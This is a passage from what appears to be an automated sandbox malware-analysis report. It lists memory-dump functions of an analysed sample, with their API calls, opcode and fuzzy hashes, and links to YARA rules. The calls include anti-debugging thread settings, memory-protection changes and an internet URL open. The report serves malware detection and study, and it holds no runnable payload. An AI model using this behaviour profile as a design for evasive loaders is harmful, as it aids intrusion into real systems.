                                  Uniqueness Score: -1.00%

                                  Function 00569972, Relevance: 1.6, APIs: 1, Instructions: 67nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: cbe3735a52a8886767192ae4a8d4582abac6ac750673d5451a15db7c07e09426
                                  • Instruction ID: 1709e27a740ce05e300db4a1cff55f99f774248bf1e1dc2133ff630c362f4285
                                  • Opcode Fuzzy Hash: cbe3735a52a8886767192ae4a8d4582abac6ac750673d5451a15db7c07e09426
                                  • Instruction Fuzzy Hash: 8611E510B08246CEDF185950A2853E42B69BB663B8FA95B66CC0607874A3B5489FD6D3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005699A6, Relevance: 1.6, APIs: 1, Instructions: 66nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: 479f87002e3eb1dc2b8bf40e5fa65ca8d01d9d95bc2a2e8503d2db5c9e20d4bf
                                  • Instruction ID: bd47a75260651abe4b289a7623b14065b3564cc35dda3d12d1e1abdfa2ea48db
                                  • Opcode Fuzzy Hash: 479f87002e3eb1dc2b8bf40e5fa65ca8d01d9d95bc2a2e8503d2db5c9e20d4bf
                                  • Instruction Fuzzy Hash: 0201D650B08242CEDF189950A1853F43B5A7B66368FA99B66CC4607C34E376489FD6D3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005699F0, Relevance: 1.6, APIs: 1, Instructions: 60nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: f5eed26749ea5a09780008cdc30d7f129f476383e62b93d51a08b2ff9727caba
                                  • Instruction ID: 4bc2767a6ee60bc6fb5172ed3eb8b5f1e90371903dea039c7154113d47a6dcf9
                                  • Opcode Fuzzy Hash: f5eed26749ea5a09780008cdc30d7f129f476383e62b93d51a08b2ff9727caba
                                  • Instruction Fuzzy Hash: 0801FE50B48643CADA085450A1822F43F5578573A87FD8F528C4B47D28F13A08AFD6D3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005645D1, Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00564657
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 3da58e8647544dbdd82cb7a577ad04264d2d7473271aff4b895856ddbc44c661
                                  • Instruction ID: 992fb376ecc93b5511735d7549391244c9895ed2250fe47de655bb9b31c93ef1
                                  • Opcode Fuzzy Hash: 3da58e8647544dbdd82cb7a577ad04264d2d7473271aff4b895856ddbc44c661
                                  • Instruction Fuzzy Hash: FD01D6704407418FEB014E2088493D97BA0EF133A2F368BA5DC5A5B4A5E36C895BDBE2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056461F, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00564657
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: fde146a11f47d81e72b713b7fa550d9aace75039bcaa2e0fb97471bef349a360
                                  • Instruction ID: 2f4765f09ce7a088bf51b8ae710d015f4fd90352a16e5c8cbfbb53ccabe4c4b0
                                  • Opcode Fuzzy Hash: fde146a11f47d81e72b713b7fa550d9aace75039bcaa2e0fb97471bef349a360
                                  • Instruction Fuzzy Hash: 71F0A0B0A80A428BEB048910A04A3D977906B573E1F3ACBA18C0E07DA5F25C853F9DD3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00568E45, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,005687BE,?,00560914,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00568E5E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                  • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                  • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                  • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 90b9e6b8f08d09ef9db0928ab95fa49aaace9d452eec4e390a8ec9c53589278a
                                  • Instruction ID: d7120df0c0bff832feb751c2d6cf20db8c34a0f26c3637532aecb1b89763b53f
                                  • Opcode Fuzzy Hash: 90b9e6b8f08d09ef9db0928ab95fa49aaace9d452eec4e390a8ec9c53589278a
                                  • Instruction Fuzzy Hash: E890027520100846D180715A440C74E000557D1741FD2C125E0115614DCA598A5977E2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: cb1c8d2d5fcb3733ec673507c55813644e377effc53bdebf322cf91ba5284f9b
                                  • Instruction ID: ef5b253acdb7bcb6d85f0a1095bd9f4498dfa1aaff230f2d729c8b345bbe54da
                                  • Opcode Fuzzy Hash: cb1c8d2d5fcb3733ec673507c55813644e377effc53bdebf322cf91ba5284f9b
                                  • Instruction Fuzzy Hash: BC90027520108846D110615A840C74E000557D0741FD6C521E4514618D86D988917162
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c0edc678dd3d5412f20d53957556f8b7131a364210a75e2bd36b31d63249d0ff
                                  • Instruction ID: 5fc600a6af3f323a45716e9acb4398a2fcbbb0e08e333fab3749652b2ca3d10d
                                  • Opcode Fuzzy Hash: c0edc678dd3d5412f20d53957556f8b7131a364210a75e2bd36b31d63249d0ff
                                  • Instruction Fuzzy Hash: D690027520100446D100659A540C74A000557E0741FD2D121E5114515EC6A988917172
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3956742ed3e9cbb02a74ed11bd24d824239a098825e83590657b4044ea83299f
                                  • Instruction ID: 25bc4bfb324759299ade31a33d5159a6e8e48ae3f7e15096fe26cf15f60d6853
                                  • Opcode Fuzzy Hash: 3956742ed3e9cbb02a74ed11bd24d824239a098825e83590657b4044ea83299f
                                  • Instruction Fuzzy Hash: 5B90026530100047D140715A541C70A4005A7E1741FD2D121E0504514CD95988567263
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d16f4fb0795ce0abd0189d26f387d24d5149582027f8353b3ac1fdf1dde9752c
                                  • Instruction ID: 7218c6ae9a9795bd688dc2b845c83eaf637acedee432c69d384e3f0db6ef6955
                                  • Opcode Fuzzy Hash: d16f4fb0795ce0abd0189d26f387d24d5149582027f8353b3ac1fdf1dde9752c
                                  • Instruction Fuzzy Hash: A590026D21300046D180715A540C70E000557D1642FD2D525E0105518CC95988697362
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ed7caeb51d3f096c5f4db7676034fc1b4b44d2d4d003d105f155e246832629e9
                                  • Instruction ID: 3d6bcd29db30a9c90b61d314f917a7bc5ab90e31f4c78ac367c30708842e5934
                                  • Opcode Fuzzy Hash: ed7caeb51d3f096c5f4db7676034fc1b4b44d2d4d003d105f155e246832629e9
                                  • Instruction Fuzzy Hash: 13900269211000470105A55A070C60B004657D57913D2C131F1105510CD66588617162
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f6de2f58bc787ee59dc09b4e11d17d319e20783fae9a41ede6624d071cc5e8bb
                                  • Instruction ID: 8983f75615fa2ed9070e6cd829f26b482c119897463b970db5b50ed9756d2c42
                                  • Opcode Fuzzy Hash: f6de2f58bc787ee59dc09b4e11d17d319e20783fae9a41ede6624d071cc5e8bb
                                  • Instruction Fuzzy Hash: F29002A5202000474105715A441C71A400A57E0641BD2C131E1104550DC56988917166
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3d4143669bf56121ab1058549018bf11846bb2b7bde5e0fcf140fefe55ec85c0
                                  • Instruction ID: 18942b807acc254915c7b78de4a9cac9840f5fe70b254e852201c28d7f370801
                                  • Opcode Fuzzy Hash: 3d4143669bf56121ab1058549018bf11846bb2b7bde5e0fcf140fefe55ec85c0
                                  • Instruction Fuzzy Hash: 33900265601000864140716A884CA0A40057BE16517D2C231E0A88510D859D886576A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6f5aa90c4fde1163df9d3b0cd01729496fd40d5791884164604994c8a34979b9
                                  • Instruction ID: cd2b128d49c6411cd359937003ae9657be47472803a458235b6b77519b4d4330
                                  • Opcode Fuzzy Hash: 6f5aa90c4fde1163df9d3b0cd01729496fd40d5791884164604994c8a34979b9
                                  • Instruction Fuzzy Hash: CF90027520140446D100615A481C70F000557D0742FD2C121E1254515D8669885175B2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d620945f3e693cf8d05b7a8986f933a5c54ab6b53c7a408285ef10d8ef515b10
                                  • Instruction ID: 3dd0743f8cca69710d495101eb44dbe0d7c3cc4d783647bcdd174005a1f54694
                                  • Opcode Fuzzy Hash: d620945f3e693cf8d05b7a8986f933a5c54ab6b53c7a408285ef10d8ef515b10
                                  • Instruction Fuzzy Hash: 8F90026521180086D200656A4C1CB0B000557D0743FD2C225E0244514CC95988617562
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9ea5c7306628ce1d6058e4ddc637eb67d249358dbfd2a1a8833a820a90bb82e1
                                  • Instruction ID: d22d96c8685158c6026a1d134419228c9a8dfbdc279ce50e2382c8d051fda9eb
                                  • Opcode Fuzzy Hash: 9ea5c7306628ce1d6058e4ddc637eb67d249358dbfd2a1a8833a820a90bb82e1
                                  • Instruction Fuzzy Hash: 7490027520100457D111615A450C70B000957D0681FD2C522E0514518D969A8952B162
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 69e20f55a7cee8b65ebd4758792e5615dea4655f1a47a69fcd8b631bdc609159
                                  • Instruction ID: 43be0823cd91e2b2ff088d531b3c57b0027198cb802e625b1c6a8a73bb32927a
                                  • Opcode Fuzzy Hash: 69e20f55a7cee8b65ebd4758792e5615dea4655f1a47a69fcd8b631bdc609159
                                  • Instruction Fuzzy Hash: AC900265242041965545B15A440C60B400667E06817D2C122E1504910C856A9856F662
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1326f8abf98fbe46a941b67f064e7e3e2f74c9e0559b3bfcbb0fbcb1c62aa70d
                                  • Instruction ID: 6eeb228c800cb474f21126f290c8bdf9585a85ca8901061fdf0fa7bbe728e60c
                                  • Opcode Fuzzy Hash: 1326f8abf98fbe46a941b67f064e7e3e2f74c9e0559b3bfcbb0fbcb1c62aa70d
                                  • Instruction Fuzzy Hash: D090026560100546D101715A440C71A000A57D0681FD2C132E1114515ECA698992B172
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8b7fe07b8690245136066acd7667b25e5ee4685ba7f8d17408db480af51850b5
                                  • Instruction ID: e848538c7147f08df8a62953956afbeb529c3dc9331f5e3088af2dec7a848549
                                  • Opcode Fuzzy Hash: 8b7fe07b8690245136066acd7667b25e5ee4685ba7f8d17408db480af51850b5
                                  • Instruction Fuzzy Hash: 6E9002B520100446D140715A440C74A000557D0741FD2C121E5154514E869D8DD576A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3E99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f87a3d4879f8736d4111da5a72d221364743103b361ee279bc3e818d2f22df1f
                                  • Instruction ID: f8c79112a0a005290d856babf543b472d98c99dbf692046d7d7bee1e16db80aa
                                  • Opcode Fuzzy Hash: f87a3d4879f8736d4111da5a72d221364743103b361ee279bc3e818d2f22df1f
                                  • Instruction Fuzzy Hash: DD9002A534100486D100615A441CB0A000597E1741FD2C125E1154514D865DCC527167
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056310E, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 95sleepnativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(00000800,?,00000000,?,00000000,00000000,?,00000000,00000000,00569B9E,00000000,00000000,00000000), ref: 005631FA
                                  • TerminateThread.KERNELBASE(000000FE,00000000), ref: 005632C6
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00564804
                                    • Part of subcall function 00563249: CreateThread.KERNELBASE(00000000,00000000,Function_00004532,00000000,00000000,00000000), ref: 0056328A
                                  • Sleep.KERNELBASE(00000005), ref: 005645C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: SleepThread$CreateMemoryProtectTerminateVirtual
                                  • String ID: 8j$jjj$=b$a
                                  • API String ID: 1091447980-1279705719
                                  • Opcode ID: 7001eeebcc146ce99ad5aa345eaf0ba294f81ef8370e5cd51e1395adde15dd41
                                  • Instruction ID: 5e8bcb7adce0a6e8c75198446e21270c562587e497bed866a08b2a48235ae596
                                  • Opcode Fuzzy Hash: 7001eeebcc146ce99ad5aa345eaf0ba294f81ef8370e5cd51e1395adde15dd41
                                  • Instruction Fuzzy Hash: 52217870644306ABFF346A108C5AFE83B51BF52710FA58652EC0A1B4E2A364888BDA53
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056315C, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 83sleepnativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(00000800,?,00000000,?,00000000,00000000,?,00000000,00000000,00569B9E,00000000,00000000,00000000), ref: 005631FA
                                  • TerminateThread.KERNELBASE(000000FE,00000000), ref: 005632C6
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00564804
                                    • Part of subcall function 00563249: CreateThread.KERNELBASE(00000000,00000000,Function_00004532,00000000,00000000,00000000), ref: 0056328A
                                  • Sleep.KERNELBASE(00000005), ref: 005645C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: SleepThread$CreateMemoryProtectTerminateVirtual
                                  • String ID: 8j$=b$a
                                  • API String ID: 1091447980-500278375
                                  • Opcode ID: c2d7701c31707b790cee0d05b7577388f2087d2b5d738b3488e395752dbe6510
                                  • Instruction ID: 0d6e061d73640444dbaf4fee1ef9eff53681f53ba0995d2677a6c6d8d81e6e5a
                                  • Opcode Fuzzy Hash: c2d7701c31707b790cee0d05b7577388f2087d2b5d738b3488e395752dbe6510
                                  • Instruction Fuzzy Hash: 10116A70644707DBFF3066109C4ABD83B51BF52360FA58B51EC0A178D5A368899BDB93
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005631AC, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72sleepnativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(00000800,?,00000000,?,00000000,00000000,?,00000000,00000000,00569B9E,00000000,00000000,00000000), ref: 005631FA
                                  • TerminateThread.KERNELBASE(000000FE,00000000), ref: 005632C6
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00564804
                                    • Part of subcall function 00563249: CreateThread.KERNELBASE(00000000,00000000,Function_00004532,00000000,00000000,00000000), ref: 0056328A
                                  • Sleep.KERNELBASE(00000005), ref: 005645C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: SleepThread$CreateMemoryProtectTerminateVirtual
                                  • String ID: a
                                  • API String ID: 1091447980-1083117053
                                  • Opcode ID: 9deb793b1239bc77159397ba11c6e782592973571f3d2447393c85404c3ef9c6
                                  • Instruction ID: 51ca029453d5f347131b720dc23a467de5878d353b5afff9ea71d63057b64c39
                                  • Opcode Fuzzy Hash: 9deb793b1239bc77159397ba11c6e782592973571f3d2447393c85404c3ef9c6
                                  • Instruction Fuzzy Hash: C8115C70A44346DBFF245A10984ABD83B51BF52310FF6C651EC0F1B892A264889BDA93
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00564E88, Relevance: 3.1, APIs: 2, Instructions: 132networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenA.WININET(005657F5,00000000,00000000,00000000,00000000,0056220A,?,00000000,?,00000041,00000252,?,00565BA4,?,?,?), ref: 00564EC9
                                  • InternetOpenUrlA.WININET(?,0C84D598,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004,?,?,?,00000852), ref: 00564FC0
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InternetOpen
                                  • String ID:
                                  • API String ID: 2038078732-0
                                  • Opcode ID: 1676a8590bd5b1543041b6d5e6a59639b7b490a693cf3df40a71ddaec2e82166
                                  • Instruction ID: 7a7e843f3ac7e1b53dc0191cee110fa18f82837a6e72dadb98bf73a7b76a0ebf
                                  • Opcode Fuzzy Hash: 1676a8590bd5b1543041b6d5e6a59639b7b490a693cf3df40a71ddaec2e82166
                                  • Instruction Fuzzy Hash: 7A41063028474BEAEF305E24DCA5BEA3B5ABF41394F504925ED4A9B180E7728984EB11
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056324E, Relevance: 3.0, APIs: 2, Instructions: 44threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00004532,00000000,00000000,00000000), ref: 0056328A
                                  • TerminateThread.KERNELBASE(000000FE,00000000), ref: 005632C6
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: Thread$CreateTerminate
                                  • String ID:
                                  • API String ID: 1265538591-0
                                  • Opcode ID: 68fbefd6092990e388c356644e9707955bb361f07d5f772b2de9345bf873c352
                                  • Instruction ID: a6c66abf4e25ed8cd73c900178d1179981c716ffb5dc88e99a5971d3423c4fc1
                                  • Opcode Fuzzy Hash: 68fbefd6092990e388c356644e9707955bb361f07d5f772b2de9345bf873c352
                                  • Instruction Fuzzy Hash: 2EF0E56068878A92FD2445401C07BF623109B52B50FF18771EE0F2ADC57288486F98E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005670C9, Relevance: 1.6, APIs: 1, Instructions: 90libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,005604F0,00000000), ref: 005672E3
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 521b1be7a884bb52728acf22f70de0397cb53f67dba7f275a1f49ef29170ada4
                                  • Instruction ID: 56c01424ec5b0c3bd4170b2b015dfbb875ba7e500e2df464b1f24c7f36b6ceb4
                                  • Opcode Fuzzy Hash: 521b1be7a884bb52728acf22f70de0397cb53f67dba7f275a1f49ef29170ada4
                                  • Instruction Fuzzy Hash: 12112981A0C74FC3DF10592060956E92F00699B3B9F758FB7AC0B13E05B618483FAAE3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00567249, Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                  Download Yara Rule
                                  APIs
